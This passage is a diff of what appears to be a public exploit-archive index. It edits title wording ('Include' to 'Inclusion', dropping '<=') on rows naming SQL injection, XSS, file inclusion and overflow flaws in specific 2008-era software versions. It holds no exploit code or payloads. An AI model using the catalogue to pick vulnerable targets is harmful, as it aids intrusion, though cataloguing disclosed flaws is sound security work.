Inclusion",2008-03-12,U238,php,webapps,0 31402,platforms/php/webapps/31402.txt,"eWeather - 'chart' Parameter Cross-Site Scripting",2008-03-12,NetJackal,php,webapps,0 31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0 31404,platforms/asp/webapps/31404.txt,"Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection",2008-03-13,The-0utl4w,asp,webapps,0 @@ -28316,10 +28316,10 @@ id,file,description,date,author,platform,type,port 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,php,webapps,0 31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0 -31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection and Remote File Include Vulnerabilities",2008-03-19,Cod3rZ,php,webapps,0 +31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection and Remote File Inclusion Vulnerabilities",2008-03-19,Cod3rZ,php,webapps,0 31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 -31444,platforms/linux/dos/31444.txt,"MySQL <= 5.1.13 - INFORMATION_SCHEMA Remote Denial Of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 +31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial Of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - manager/getImportFileRedirect.jsp file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - manager/fileManager.jsp dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 @@ -28396,7 +28396,7 @@ id,file,description,date,author,platform,type,port 31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-03-25,U238,php,webapps,0 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0 31534,platforms/windows/remote/31534.html,"LEADTOOLS Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 -31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Include",2008-03-25,0in,php,webapps,0 +31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps,0 31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,windows,remote,0 31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 - webapps/blackboard/execute/viewCatalog searchText Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0 31538,platforms/cgi/webapps/31538.txt,"Blackboard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0 @@ -28411,13 +28411,13 @@ id,file,description,date,author,platform,type,port 31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - Malformed JPEG File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0 31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0 -31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities",2008-03-27,XxX,php,webapps,0 +31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion Vulnerabilities",2008-03-27,XxX,php,webapps,0 31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms - 'strfmon()' Function Integer Overflow Weakness",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 31551,platforms/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Disclosure",2005-10-14,"security curmudgeon",multiple,remote,0 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0 -31555,platforms/php/webapps/31555.txt,"Simple Machines Forum <= 1.1.4 - Multiple Remote File Include Vulnerabilities",2008-03-28,Sibertrwolf,php,webapps,0 +31555,platforms/php/webapps/31555.txt,"Simple Machines Forum 1.1.4 - Multiple Remote File Inclusion Vulnerabilities",2008-03-28,Sibertrwolf,php,webapps,0 31556,platforms/php/webapps/31556.txt,"Cuteflow Bin 1.5 - pages/showtemplates.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 31557,platforms/php/webapps/31557.txt,"Cuteflow Bin 1.5 - pages/editmailinglist_step1.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 31558,platforms/php/webapps/31558.txt,"Cuteflow Bin 1.5 - pages/showcirculation.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0 @@ -28427,8 +28427,8 @@ id,file,description,date,author,platform,type,port 31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service and Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31565,platforms/php/webapps/31565.txt,"@lex Guestbook <= 4.0.5 - setup.php language_setup Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 -31566,platforms/php/webapps/31566.txt,"@lex Guestbook <= 4.0.5 - index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 +31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 +31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF",2014-02-11,killall-9,hardware,webapps,80 @@ -28444,10 +28444,10 @@ id,file,description,date,author,platform,type,port 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31581,platforms/php/webapps/31581.txt,"PhpGKit 0.9 - 'connexion.php' Remote File Include",2008-03-31,ZoRLu,php,webapps,0 +31581,platforms/php/webapps/31581.txt,"PhpGKit 0.9 - 'connexion.php' Remote File Inclusion",2008-03-31,ZoRLu,php,webapps,0 31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 - 'catID' Parameter SQL Injection",2008-03-31,RMx,asp,webapps,0 31583,platforms/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation - Remote Information Disclosure",2008-03-31,"Alexander Klink",windows,remote,0 -31584,platforms/php/webapps/31584.txt,"Terracotta - 'index.php' Local File Include",2008-04-01,"Joseph Giron",php,webapps,0 +31584,platforms/php/webapps/31584.txt,"Terracotta - 'index.php' Local File Inclusion",2008-04-01,"Joseph Giron",php,webapps,0 31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 - Kernel Usermode Callback Local Privilege Escalation (1)",2008-04-08,Whitecell,windows,dos,0 31587,platforms/php/webapps/31587.txt,"EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 31588,platforms/php/webapps/31588.txt,"EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0 @@ -28477,7 +28477,7 @@ id,file,description,date,author,platform,type,port 31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Parameter Integer Overflow",2008-04-21,"Core Security Technologies",osx,remote,0 31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,php,webapps,0 31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial-of-Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 -31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Include",2008-04-04,ZoRLu,php,webapps,0 +31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0 31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service",2008-04-21,"Rodrigo Carvalho",osx,dos,0 @@ -28488,13 +28488,13 @@ id,file,description,date,author,platform,type,port 31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7.0 - Header Handling 'res://' Information Disclosure",2008-04-07,"The Hacker Webzine",windows,remote,0 31625,platforms/php/webapps/31625.txt,"Prozilla Gaming Directory 1.0 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0 +31627,platforms/unix/dos/31627.c,"LICQ 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0 31628,platforms/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0 31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos,0 31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 -31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0 +31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 -31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Include",2008-04-09,bd0rk,php,webapps,0 +31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote,0 31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial Of Service",2008-04-10,ryujin,windows,dos,0 31636,platforms/php/webapps/31636.txt,"W2B phpHotResources - 'cat.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps,0 @@ -28514,8 +28514,8 @@ id,file,description,date,author,platform,type,port 31651,platforms/php/webapps/31651.txt,"amfphp 1.2 - browser/methodTable.php class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31652,platforms/php/webapps/31652.txt,"amfphp 1.2 - browser/code.php Multiple Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31653,platforms/php/webapps/31653.txt,"amfphp 1.2 - browser/details class Parameter XSS",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Include",2008-04-15,THuM4N,php,webapps,0 -31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Include",2008-04-15,THuGM4N,php,webapps,0 +31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0 +31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0 31656,platforms/windows/dos/31656.txt,"ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow",2008-04-16,"Leon Juranic",windows,dos,0 31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting",2008-04-16,ZoRLu,php,webapps,0 31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 @@ -28530,18 +28530,18 @@ id,file,description,date,author,platform,type,port 31667,platforms/windows/local/31667.txt,"Microsoft Windows SeImpersonatePrivilege - Local Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injection Vulnerabilities",2008-04-18,ZoRLu,php,webapps,0 31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 -31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 +31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 - admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0 31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps,0 31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0 -31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 - Multiple Local File Include Vulnerabilities",2008-04-19,KnocKout,php,webapps,0 +31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 - Multiple Local File Inclusion Vulnerabilities",2008-04-19,KnocKout,php,webapps,0 31676,platforms/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,php,webapps,0 31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Parameter Cross-Site Scripting",2008-04-21,ZoRLu,php,webapps,0 -31678,platforms/php/webapps/31678.txt,"SMF <= 1.1.4 - Audio CAPTCHA Security Bypass",2008-04-21,"Michael Brooks",php,webapps,0 -31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 - 'mod_search' Remote File Include",2008-04-21,ZoRLu,php,webapps,0 +31678,platforms/php/webapps/31678.txt,"SMF 1.1.4 - Audio CAPTCHA Security Bypass",2008-04-21,"Michael Brooks",php,webapps,0 +31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 - 'mod_search' Remote File Inclusion",2008-04-21,ZoRLu,php,webapps,0 31714,platforms/php/webapps/31714.txt,"C-News 1.0.1 - 'install.php' Cross-Site Scripting",2008-04-30,ZoRLu,php,webapps,0 -31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc <= 7.0.19 - Community String Stack Based Buffer Overflow",2008-11-11,"raveen Darshanam",multiple,remote,0 +31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow",2008-11-11,"raveen Darshanam",multiple,remote,0 31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module - 'article.php' SQL Injection",2008-04-21,Cr@zy_King,php,webapps,0 31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 - Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,Metasploit,windows,remote,9090 @@ -28560,8 +28560,8 @@ id,file,description,date,author,platform,type,port 31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - upload/install/index.php step Parameter XSS",2008-04-24,ZoRLu,php,webapps,0 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0 31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial Of Service",2008-04-24,"Luigi Auriemma",windows,dos,0 -31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 - Component mosConfig_absolute_path Remote File Include",2008-04-26,NoGe,php,webapps,0 -31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting and Local File Include",2008-04-26,"Khashayar Fereidani",php,webapps,0 +31708,platforms/php/webapps/31708.txt,"Joomla Visites 1.1 - Component mosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps,0 +31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting and Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps,0 31710,platforms/novell/dos/31710.txt,"Novell GroupWise 7.0 - HTML Injection and Denial of Service Vulnerabilities",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0 31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting",2008-04-28,"Khashayar Fereidani",php,webapps,0 @@ -28603,7 +28603,7 @@ id,file,description,date,author,platform,type,port 31749,platforms/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injection Vulnerabilities",2008-05-06,The:Paradox,php,webapps,0 31750,platforms/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload",2008-05-06,"CrAzY CrAcKeR",php,webapps,0 31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Parameter Cross-Site Scripting",2008-05-06,"Christian Holler",php,webapps,0 -31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Include Vulnerabilities",2008-05-07,Matrix86,php,webapps,0 +31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Inclusion Vulnerabilities",2008-05-07,Matrix86,php,webapps,0 31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0 31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate wgate.dll ~service Parameter XSS",2008-05-08,Portcullis,cgi,webapps,0 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String Javascript Splicing XSS",2008-05-08,Portcullis,cgi,webapps,0 @@ -28633,9 +28633,9 @@ id,file,description,date,author,platform,type,port 31779,platforms/php/webapps/31779.txt,"phpInstantGallery 2.0 - image.php Multiple Parameter XSS",2008-05-12,ZoRLu,php,webapps,0 31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities",2008-05-12,SkyOut,php,webapps,0 -31782,platforms/php/webapps/31782.txt,"Claroline <= 1.7.5 - Multiple Remote File Include Vulnerabilities",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 -31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Include",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 -31784,platforms/php/webapps/31784.txt,"PhpMyAgenda 2.1 - 'infoevent.php3' Remote File Include",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31782,platforms/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusion Vulnerabilities",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 +31784,platforms/php/webapps/31784.txt,"PhpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0 31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 - 'AccesCodeStart.asp' Cross-Site Scripting",2008-05-13,"Brad Antoniewicz",asp,webapps,0 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 @@ -28651,27 +28651,27 @@ id,file,description,date,author,platform,type,port 31797,platforms/asp/webapps/31797.txt,"Philboard 0.5 - W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0 31798,platforms/php/webapps/31798.txt,"Philboard 0.5 - W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0 31799,platforms/php/webapps/31799.txt,"Philboard 0.5 - W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0 -31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart <= 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,php,webapps,0 +31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,php,webapps,0 31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 - glossaire.php id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0 31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 - glossaire.php id Parameter XSS",2008-05-16,ZoRLu,php,webapps,0 31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 -31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Include",2008-05-16,ZoRLu,php,webapps,0 +31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Inclusion",2008-05-16,ZoRLu,php,webapps,0 31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' Parameter SQL Injection",2008-05-17,Lovebug,php,webapps,0 -31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Parameter Local File Include",2008-05-19,Lostmon,php,webapps,0 -31807,platforms/php/webapps/31807.txt,"cPanel <= 11.21 - 'wwwact' Remote Privilege Escalation",2008-05-19,"Ali Jasbi",php,webapps,0 -31808,platforms/php/webapps/31808.txt,"AppServ Open Project <= 2.5.10 - 'appservlang' Parameter Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps,0 +31806,platforms/php/webapps/31806.txt,"bcoos 1.0.13 - 'file' Parameter Local File Inclusion",2008-05-19,Lostmon,php,webapps,0 +31807,platforms/php/webapps/31807.txt,"cPanel 11.21 - 'wwwact' Remote Privilege Escalation",2008-05-19,"Ali Jasbi",php,webapps,0 +31808,platforms/php/webapps/31808.txt,"AppServ Open Project 2.5.10 - 'appservlang' Parameter Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps,0 31809,platforms/php/webapps/31809.txt,"Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting",2008-05-20,"CWH Underground",php,webapps,0 31810,platforms/php/webapps/31810.txt,"Web Slider 0.6 - 'slide' Parameter SQL Injection",2008-05-20,"fahn zichler",php,webapps,0 31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti - Multiple SQL Injection Vulnerabilities",2008-05-20,"fahn zichler",asp,webapps,0 31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 - 'ayrinti.asp' Parameter SQL Injection",2008-05-20,U238,asp,webapps,0 31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 - Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0 31814,platforms/windows/remote/31814.py,"Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0 -31815,platforms/linux/dos/31815.html,"libxslt XSL <= 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 +31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,java,webapps,0 31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0 31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0 31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",windows,dos,0 -31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime <= 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0 +31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0 31821,platforms/php/webapps/31821.txt,"phpFreeForum 1.0 rc2 - error.php message Parameter XSS",2008-05-22,tan_prathan,php,webapps,0 31822,platforms/php/webapps/31822.txt,"phpFreeForum 1.0 rc2 - part/menu.php Multiple Parameter XSS",2008-05-22,tan_prathan,php,webapps,0 31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 @@ -28679,7 +28679,7 @@ id,file,description,date,author,platform,type,port 31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - index.php outpused Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter XSS",2008-05-22,"CWH Underground",php,webapps,0 -31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall <= 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",hardware,remote,0 